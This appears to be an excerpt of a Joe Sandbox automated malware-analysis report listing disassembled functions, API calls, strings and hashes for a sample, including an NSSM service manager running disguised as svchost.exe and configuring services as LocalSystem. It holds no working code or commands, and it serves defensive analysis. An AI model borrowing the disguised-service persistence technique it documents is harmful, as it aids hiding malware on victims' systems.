Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: ErrorLastLoadString$Message__vswprintf_c_l_swprintf
String ID:
API String ID: 2205000856-0
Opcode ID: 67094a9aa27c05f61b99f26d1da0b4bc76a919ccd275d9b0df56120526754fea
Instruction ID: 9145d163c6f2193eddd2626d0ee9881a08dca4e6502684729794c941a0b659f5
Opcode Fuzzy Hash: 67094a9aa27c05f61b99f26d1da0b4bc76a919ccd275d9b0df56120526754fea
Instruction Fuzzy Hash: 5DF02B32500214BBF72177A08C46FCB375CAB15385F044177F901E60E2D67998758B7E

Function 00421ED3 Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00421EDF

Part of subcall function 0041E574: __getptd_noexit.LIBCMT ref: 0041E577
Part of subcall function 0041E574: __amsg_exit.LIBCMT ref: 0041E584

__getptd.LIBCMT ref: 00421EF6
__amsg_exit.LIBCMT ref: 00421F04
__lock.LIBCMT ref: 00421F14

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: 9bbfce21fc56b317f6a36a82937c31e252a0bf44d043ae3dcf04175c47f93af7
Instruction ID: d9405fda9bc9e752a47143f7e14e80d5593d74a137349638377a145df8a8a40d
Opcode Fuzzy Hash: 9bbfce21fc56b317f6a36a82937c31e252a0bf44d043ae3dcf04175c47f93af7
Instruction Fuzzy Hash: FBF06831F007109BD720FB66950278973A06F10755FD1012FE855572B1CB7CA942DE5D

Function 00402732 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 385COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00402A26

Strings

;%u, xrefs: 00402A14

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: _swprintf
String ID: ;%u
API String ID: 589789837-535004727
Opcode ID: 3da00b9edbe83a003e410a14ed99af05545b81a56b3ce312bffc0a184933b4cc
Instruction ID: 01cf00ea518033ca7b4007dbaca87e84521696031840c89cb653a4e5b8555c94
Opcode Fuzzy Hash: 3da00b9edbe83a003e410a14ed99af05545b81a56b3ce312bffc0a184933b4cc
Instruction Fuzzy Hash: 94D1D4702047498ADB38EB358649BEF77D9AF40304F14083FE856A72C2DBBCA885C759

Function 00409B7F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00409BAC
_wcslen.LIBCMT ref: 00409CA7

Strings

__rar_, xrefs: 00409CDE

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: _wcslen
String ID: __rar_
API String ID: 176396367-2561138058
Opcode ID: 4d336d1affc06057673b0234350a02fef288ad40e246159464c0613795f817f6
Instruction ID: 6a4a431c1e56d1c493be786a475568a8fecc6470f953a98c2c27572f7f48e8b2
Opcode Fuzzy Hash: 4d336d1affc06057673b0234350a02fef288ad40e246159464c0613795f817f6
Instruction Fuzzy Hash: F741E032A0425966DF21AE65CC84BEF37ADAF04354F04047BF809B7293D63CDD90CA68

Function 0040CBE8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

Part of subcall function 0040CBA9: LoadLibraryW.KERNEL32(Crypt32.dll,00000020,0040CC01,00000020,?,?,00405CD9,?,00000020,00000001,00000000,?,00000010,?,?,?), ref: 0040CBB7
Part of subcall function 0040CBA9: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0040CBD0
Part of subcall function 0040CBA9: GetProcAddress.KERNEL32(00437800,CryptUnprotectMemory), ref: 0040CBDC

GetCurrentProcessId.KERNEL32(00000020,?,?,00405CD9,?,00000020,00000001,00000000,?,00000010,?,?,?,00000001,?,?), ref: 0040CC6F

Strings

CryptProtectMemory failed, xrefs: 0040CC2F
CryptUnprotectMemory failed, xrefs: 0040CC68

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: AddressProc$CurrentLibraryLoadProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 137661620-396321323
Opcode ID: a7536082de5730fe441caf6f3dfc1f6efdb8306066e4af88d8e8ecf7f82d8db2
Instruction ID: 51533d20160d73d975f84f2b5b6479ab0bae40eb141f677a3a9346ce3b218a5c
Opcode Fuzzy Hash: a7536082de5730fe441caf6f3dfc1f6efdb8306066e4af88d8e8ecf7f82d8db2
Instruction Fuzzy Hash: 02112071308211ABEB19AF20ECD567F3755CB45B10B14423FF84AAB2C1CA3C9C86939D

Function 00410E06 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00010000,00410DA8,?,00000000,?), ref: 00410E2A
SetThreadPriority.KERNEL32(?,00000000,?,?,00410E96,-00000108,00404F9C), ref: 00410E71

Part of subcall function 00406381: __vswprintf_c_l.LIBCMT ref: 0040639F

Strings

CreateThread failed, xrefs: 00410E36

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: Thread$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2655393344-3849766595
Opcode ID: 6b26c6268f929c018fc4b191c811a9b7d2ee4e5fd23ea17b8fcf5990ae839919
Instruction ID: d4f0eb2f7443d7b09686094e07eb9f8acc7c843fb6db64868415af7a66967b1e
Opcode Fuzzy Hash: 6b26c6268f929c018fc4b191c811a9b7d2ee4e5fd23ea17b8fcf5990ae839919
Instruction Fuzzy Hash: EB01F271344306BBD3202F56AC46BA77358EB04726F20043FFA86A2280DAF468918A2D

Function 00409EF9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

_wcschr.LIBCMT ref: 00409F11
_wcspbrk.LIBCMT ref: 00409F59

Strings

?*<>|", xrefs: 00409F53

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: _wcschr_wcspbrk
String ID: ?*<>|"
API String ID: 3305141221-226352099
Opcode ID: a882da7c2b875a8276cec26aa64494d63701d047f4c21e7081327baf51adad04
Instruction ID: 7fc460efae3d9017256364a12bed320641fec45423bc778f8469a37c7f49cbc4
Opcode Fuzzy Hash: a882da7c2b875a8276cec26aa64494d63701d047f4c21e7081327baf51adad04
Instruction Fuzzy Hash: 83F0A42615432395DE2C662694016B363E89B19759B64847FF8C1F62C7EB7CDCC2C16C

Function 0041DA6B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00419FA7: __getptd.LIBCMT ref: 00419FAD
Part of subcall function 00419FA7: __getptd.LIBCMT ref: 00419FBD

__getptd.LIBCMT ref: 0041DA7A

Part of subcall function 0041E574: __getptd_noexit.LIBCMT ref: 0041E577
Part of subcall function 0041E574: __amsg_exit.LIBCMT ref: 0041E584

__getptd.LIBCMT ref: 0041DA88

Strings

csm, xrefs: 0041DA96

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: 901adaa85fb6a5a64b023c28a50e0534b3bb249fc2f2a9c113e815f6bb73f028
Instruction ID: b0fcfc9cf733b5e84ca0b8e95cea4546bd727dda41900d12ab222a224a7e6489
Opcode Fuzzy Hash: 901adaa85fb6a5a64b023c28a50e0534b3bb249fc2f2a9c113e815f6bb73f028
Instruction Fuzzy Hash: 720146B4D042149ACF34DF62C440AEFB7B5AF10399FA4442FE442963A1CB389AD1CB5D

Function 00410AAD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMONLIBRARYCODE

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00410C7B,?), ref: 00410AB3
GetLastError.KERNEL32(?), ref: 00410ABF

Part of subcall function 00406381: __vswprintf_c_l.LIBCMT ref: 0040639F

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00410AC8

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: 07d0bb2500cb9ccda4064a11293933eb64a3c7203a3996a6424fcf81e7c2c8f7
Instruction ID: d29c7ddd4567ab334f719f964539e6a162cdf623e087f48c6918d4cfc55fb95b
Opcode Fuzzy Hash: 07d0bb2500cb9ccda4064a11293933eb64a3c7203a3996a6424fcf81e7c2c8f7
Instruction Fuzzy Hash: 0CD0C731A085207BCA013B28AC0A99E34048B11330BA1073AF932612E2DB690AA242AE

Analysis Process: svchost.exePID: 7276, Parent PID: 7224COMMON

Execution Graph

Execution Coverage:	4.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	6.6%
Total number of Nodes:	2000
Total number of Limit Nodes:	53

Executed Functions

Function 00409B70 Relevance: 40.6, APIs: 8, Strings: 15, Instructions: 334
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00401A00: GetConsoleWindow.KERNELBASE ref: 00401A01
Part of subcall function 00401A00: GetWindowThreadProcessId.USER32(00000000), ref: 00401A10
Part of subcall function 00401A00: GetCurrentProcessId.KERNEL32 ref: 00401A1A
Part of subcall function 00401A00: FreeConsole.KERNEL32 ref: 00401A25

__fileno.LIBCMT ref: 00409B86
__setmode.LIBCMT ref: 00409B8F
__fileno.LIBCMT ref: 00409BA5
__setmode.LIBCMT ref: 00409BAE

Part of subcall function 00413A6D: ___lock_fhandle.LIBCMT ref: 00413B12
Part of subcall function 00413A6D: __setmode_nolock.LIBCMT ref: 00413B2A

Part of subcall function 00409920: AllocateAndInitializeSid.ADVAPI32(?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00409969
Part of subcall function 00409920: CheckTokenMembership.KERNELBASE(00000000,?,0042340D,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040997E
Part of subcall function 00409920: FreeSid.ADVAPI32(?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00409989

Part of subcall function 00413919: _doexit.LIBCMT ref: 00413925

TlsAlloc.KERNEL32(00000000), ref: 00409EB0
GetStdHandle.KERNEL32(000000F6), ref: 00409ECB
StartServiceCtrlDispatcherW.ADVAPI32 ref: 00409EF4
GetLastError.KERNEL32 ref: 00409EFE

Part of subcall function 004099A0: _memset.LIBCMT ref: 004099BD
Part of subcall function 004099A0: GetProcessHeap.KERNEL32 ref: 004099E2
Part of subcall function 004099A0: HeapAlloc.KERNEL32(00000000), ref: 004099EB

Strings

remove, xrefs: 00409DE6
rotate, xrefs: 00409D04
edit, xrefs: 00409D7A
stop, xrefs: 00409C12
start, xrefs: 00409BE6
continue, xrefs: 00409CAC
NSSM, xrefs: 00409EDC
pause, xrefs: 00409C80
status, xrefs: 00409CD8
set, xrefs: 00409DAA
unset, xrefs: 00409DD2
reset, xrefs: 00409DBE
restart, xrefs: 00409C3E
install, xrefs: 00409D33
get, xrefs: 00409D92

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: Process$AllocConsoleFreeHeapWindow__fileno__setmode$AllocateCheckCtrlCurrentDispatcherErrorHandleInitializeLastMembershipServiceStartThreadToken___lock_fhandle__setmode_nolock_doexit_memset
String ID: NSSM$continue$edit$get$install$pause$remove$reset$restart$rotate$set$start$status$stop$unset
API String ID: 4221750250-1322290842
Opcode ID: 8e0dd923451d7cc970bd1a40e54186b7d1993578e1d60054d8f75cea67493da1
Instruction ID: 8d0ce95e1571a4db95220a4f6881cac6d3a3a374ab3f9564aeafd07009bbe4f6
Opcode Fuzzy Hash: 8e0dd923451d7cc970bd1a40e54186b7d1993578e1d60054d8f75cea67493da1
Instruction Fuzzy Hash: D691A1F1E5030166DA10BA72AC46B5B325D4F6031EF14093FB845B22C7FA7DEE9485AE

Function 0040EC60 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 220
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__snwprintf_s.LIBCMT ref: 0040ECD9
ChangeServiceConfigW.ADVAPI32(?,?,?,000000FF,00000000,00000000,00000000,0041E5D8,?,00000000,?,?,?,00000000), ref: 0040ED79
GetProcessHeap.KERNEL32(00000000,?,?,?,00000000), ref: 0040ED8E
HeapFree.KERNEL32(00000000,?,?,00000000), ref: 0040ED95
GetLastError.KERNEL32(?,?,00000000), ref: 0040ED9B

Strings

LocalSystem, xrefs: 0040ED23

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: Heap$ChangeConfigErrorFreeLastProcessService__snwprintf_s
String ID: LocalSystem
API String ID: 3404593348-3718507506
Opcode ID: 41f063981e1366348621d5f49daee988617f9f6c866f27ec98b904e9930f1709
Instruction ID: 6c351189403f5eb6c5fe8513cea9cc0aa6b3904080e0031a5e5be75d4344df1b
Opcode Fuzzy Hash: 41f063981e1366348621d5f49daee988617f9f6c866f27ec98b904e9930f1709
Instruction Fuzzy Hash: 9071ECF1904701ABE720DB65DC49FA773A8EF84308F048D3EF559A22C1E778E8558769

Function 00409920 Relevance: 4.5, APIs: 3, Instructions: 43
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AllocateAndInitializeSid.ADVAPI32(?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00409969
CheckTokenMembership.KERNELBASE(00000000,?,0042340D,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040997E
FreeSid.ADVAPI32(?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00409989

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 628fba0404b7c400409226c91e7c1594c4cf8dc2a312d52cc7af963d2352c708
Instruction ID: 72e0c7922e14d595f5e3848571bc75bc3c4e4abfa34b06bfca4019b358322d7e
Opcode Fuzzy Hash: 628fba0404b7c400409226c91e7c1594c4cf8dc2a312d52cc7af963d2352c708
Instruction Fuzzy Hash: 4501A77134C380BFD301DB649985A6BBFD8AB99700FC4985EF58583242D174D408C76B

Function 0040D990 Relevance: 27.1, APIs: 18, Instructions: 98
memoryserviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,?,?,771AF380,00000000,004065B0,?,?,00000030,C00003EB,environment,install()), ref: 0040D9B8
HeapFree.KERNEL32(00000000), ref: 0040D9BB
GetProcessHeap.KERNEL32(00000000,?,?,771AF380,00000000,004065B0,?,?,00000030,C00003EB,environment,install()), ref: 0040D9E3
HeapFree.KERNEL32(00000000), ref: 0040D9E6
GetProcessHeap.KERNEL32(00000000,?,?,771AF380,00000000,004065B0,?,?,00000030,C00003EB,environment,install()), ref: 0040D9F5
HeapFree.KERNEL32(00000000), ref: 0040D9F8
GetProcessHeap.KERNEL32(00000000,?,?,771AF380,00000000,004065B0,?,?,00000030,C00003EB,environment,install()), ref: 0040DA07
HeapFree.KERNEL32(00000000), ref: 0040DA0A
GetProcessHeap.KERNEL32(00000000,?,?,771AF380,00000000,004065B0,?,?,00000030,C00003EB,environment,install()), ref: 0040DA19
HeapFree.KERNEL32(00000000), ref: 0040DA1C
CloseServiceHandle.ADVAPI32(?,?,771AF380,00000000,004065B0,?,?,00000030,C00003EB,environment,install()), ref: 0040DA29
CloseHandle.KERNEL32(?,00000000,?,771AF380,00000000,004065B0,?,?,00000030,C00003EB,environment,install()), ref: 0040DA41
UnregisterWait.KERNEL32(?), ref: 0040DA4E
DeleteCriticalSection.KERNEL32(?,00000000,?,771AF380,00000000,004065B0,?,?,00000030,C00003EB,environment,install()), ref: 0040DA64
CloseHandle.KERNEL32(?,00000000,?,771AF380,00000000,004065B0,?,?,00000030,C00003EB,environment,install()), ref: 0040DA75
FreeEnvironmentStringsW.KERNEL32(?,?,771AF380,00000000,004065B0,?,?,00000030,C00003EB,environment,install()), ref: 0040DA83
GetProcessHeap.KERNEL32(00000000,?,?,771AF380,00000000,004065B0,?,?,00000030,C00003EB,environment,install()), ref: 0040DA8C
RtlFreeHeap.NTDLL(00000000), ref: 0040DA8F

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: Heap$Free$Process$CloseHandle$CriticalDeleteEnvironmentSectionServiceStringsUnregisterWait
String ID:
API String ID: 223489879-0
Opcode ID: 115bcf30406b6ff842ec37e1375dc7df3e087b6a23b02530f15371c741b9abf6
Instruction ID: 77dd6ce9f9945231fd51557c9ffd4fac1d491a87d3cf4fd6406c7136dc2c8fa9
Opcode Fuzzy Hash: 115bcf30406b6ff842ec37e1375dc7df3e087b6a23b02530f15371c741b9abf6
Instruction Fuzzy Hash: 5E3112F1F04701ABE7209BB6DC45FA7B7DCAF44745F054929BA59E3280CA78EC048A38

Function 0040A9C0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 124
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__snwprintf_s.LIBCMT ref: 0040A9FA

Part of subcall function 00412731: __vsnwprintf_s_l.LIBCMT ref: 00412748

RegCreateKeyExW.KERNELBASE(80000002,?,00000000,00000000,00000000,00020006,00000000,?,?,?,?,?,?,?,00000000), ref: 0040AA5D
GetLastError.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0040AA69

Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460

Strings

create_exit_action(), xrefs: 0040AA08
NSSM_REG_EXIT, xrefs: 0040AA0D
AppExit, xrefs: 0040A9E3, 0040AB0C
SYSTEM\CurrentControlSet\Services\%s\Parameters\%s, xrefs: 0040A9E9

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: Event$Source$CreateDeregisterErrorLastRegisterReport__snwprintf_s__vsnwprintf_s_l
String ID: AppExit$NSSM_REG_EXIT$SYSTEM\CurrentControlSet\Services\%s\Parameters\%s$create_exit_action()
API String ID: 508490100-4149098550
Opcode ID: 4fcb7e5af628b31a412a967c9f9c41a1b2acc9b1253a557f1fea2d54328a6c8b
Instruction ID: c54e0a44a042602298dc2c5b83e2bd5604e14107d9abb35974e2f0600bad2026
Opcode Fuzzy Hash: 4fcb7e5af628b31a412a967c9f9c41a1b2acc9b1253a557f1fea2d54328a6c8b
Instruction Fuzzy Hash: FB4109F1B443006BE6209754CD4BFEB7398DB98704F50452EF64AAA1C2EAB8D544CB9B

Function 0040B310 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 90
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__snwprintf_s.LIBCMT ref: 0040B349

Part of subcall function 00412731: __vsnwprintf_s_l.LIBCMT ref: 00412748

__snwprintf_s.LIBCMT ref: 0040B365
RegCreateKeyExW.KERNELBASE(80000002,?,00000000,00000000,00000000,?,00000000,?,00000000), ref: 0040B3CA
GetLastError.KERNEL32(00000000), ref: 0040B3D6
RegOpenKeyExW.ADVAPI32(80000002,?,00000000,?), ref: 0040B41F

Strings

open_registry(), xrefs: 0040B373
NSSM_REGISTRY, xrefs: 0040B378
SYSTEM\CurrentControlSet\Services\%s\Parameters, xrefs: 0040B354
SYSTEM\CurrentControlSet\Services\%s\Parameters\%s, xrefs: 0040B338

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

